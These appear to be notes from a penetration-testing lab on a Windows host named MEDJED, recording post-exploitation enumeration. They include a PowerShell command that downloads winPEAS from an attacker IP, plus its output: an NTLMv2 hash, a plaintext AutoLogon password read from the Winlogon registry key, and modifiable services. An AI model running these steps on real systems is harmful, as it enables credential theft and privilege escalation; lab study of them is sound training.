PEAS


Conducting an automated enumeration after performing a manual enumeration

PS C:\tmp> iwr -Uri http://192.168.45.195/winPEASx64.exe -OutFile C:\tmp\winPEASx64.exe

Delivery complete

Executing PEAS

ENV


����������͹ User Environment Variables
� Check for some passwords or keys in the env variables 
    COMPUTERNAME: MEDJED
    PSExecutionPolicyPreference: Bypass
    HOMEPATH: \Users\Jerren
    LOCALAPPDATA: C:\Users\Jerren\AppData\Local
    PSModulePath: C:\Users\Jerren\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\Yarn\bin\;C:\Program Files (x86)\nodejs\;C:\Ruby26-x64\bin;C:\Users\Jerren\AppData\Local\Microsoft\WindowsApps;C:\Users\Jerren\AppData\Local\Yarn\bin;C:\Users\Jerren\AppData\Roaming\npm;
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    LOGONSERVER: \\MEDJED
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.RB;.RBW;.CPL
    HOMEDRIVE: C:
    SystemRoot: C:\WINDOWS
    RUBYOPT: -Eutf-8
    SESSIONNAME: Console
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    USERPROFILE: C:\Users\Jerren
    AP_PARENT_PID: 6360
    APPDATA: C:\Users\Jerren\AppData\Roaming
    PROCESSOR_REVISION: 0101
    USERNAME: Jerren
    CommonProgramW6432: C:\Program Files\Common Files
    OneDrive: C:\Users\Jerren\OneDrive
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    USERDOMAIN_ROAMINGPROFILE: MEDJED
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    ComSpec: C:\WINDOWS\system32\cmd.exe
    PROMPT: $P$G
    SystemDrive: C:
    TEMP: C:\Users\Jerren\AppData\Local\Temp
    ProgramFiles: C:\Program Files
    NUMBER_OF_PROCESSORS: 2
    TMP: C:\Users\Jerren\AppData\Local\Temp
    ProgramData: C:\ProgramData
    ProgramW6432: C:\Program Files
    windir: C:\WINDOWS
    USERDOMAIN: MEDJED
    PUBLIC: C:\Users\Public
 
����������͹ System Environment Variables
� Check for some passwords or keys in the env variables 
    ComSpec: C:\WINDOWS\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\WINDOWS\TEMP
    TMP: C:\WINDOWS\TEMP
    USERNAME: SYSTEM
    windir: C:\WINDOWS
    Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\Yarn\bin\;C:\Program Files (x86)\nodejs\
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

N/A


UAC


PowerShell


C:\Users\Jerren\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

NTLM


Jerren::MEDJED:1122334455667788:12d2388776ee84388d1d4fa83ce40536:0101000000000000fbd7ac131eabdb0181e9e75da82d451700000000080030003000000000000000000000000020000082de34bf2a9e4fb18c2af32412bc58b0d503f4e5a563f15d0345305d8e4445210a00100000000000000000000000000000000000090000000000000000000000

.NET


Token Privileges (jerren)


Enumerated

RDP Session


The jerren user has an RDP session

AutoLogon


Password of the jerren user found; CatastropheToes543

PS C:\tmp> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ    
    LegalNoticeText    REG_SZ    
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    LastLogOffEndTimePerfCounter    REG_QWORD    0x2113f6cfbd3
    ShutdownFlags    REG_DWORD    0x13
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    CatastropheToes543
    DefaultUserName    REG_SZ    Jerren
    DisableCad    REG_DWORD    0x1
    DisableLockWorkstation    REG_DWORD    0x0
    EnableFirstLogonAnimation    REG_DWORD    0x1
    AutoLogonSID    REG_SZ    S-1-5-21-242175207-3260895204-4250494957-1003
    LastUsedUsername    REG_SZ    Jerren
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey

Confirmed

Services


Interesting Services


Write access to the C:\bd directory

Modifiable Services


    RmSvc: GenericExecute (Start/Stop)
    wcncsvc: GenericExecute (Start/Stop)
    BcastDVRUserService_4bbfd: GenericExecute (Start/Stop)
    ConsentUxUserSvc_4bbfd: GenericExecute (Start/Stop)
    CredentialEnrollmentManagerUserSvc_4bbfd: GenericExecute (Start/Stop)
    DeviceAssociationBrokerSvc_4bbfd: GenericExecute (Start/Stop)
    DevicePickerUserSvc_4bbfd: GenericExecute (Start/Stop)
    DevicesFlowUserSvc_4bbfd: GenericExecute (Start/Stop)
    PimIndexMaintenanceSvc_4bbfd: GenericExecute (Start/Stop)
    PrintWorkflowUserSvc_4bbfd: GenericExecute (Start/Stop)
    UdkUserSvc_4bbfd: GenericExecute (Start/Stop)
    UnistoreSvc_4bbfd: GenericExecute (Start/Stop)
    UserDataSvc_4bbfd: GenericExecute (Start/Stop)
    WpnUserService_4bbfd: GenericExecute (Start/Stop)

Network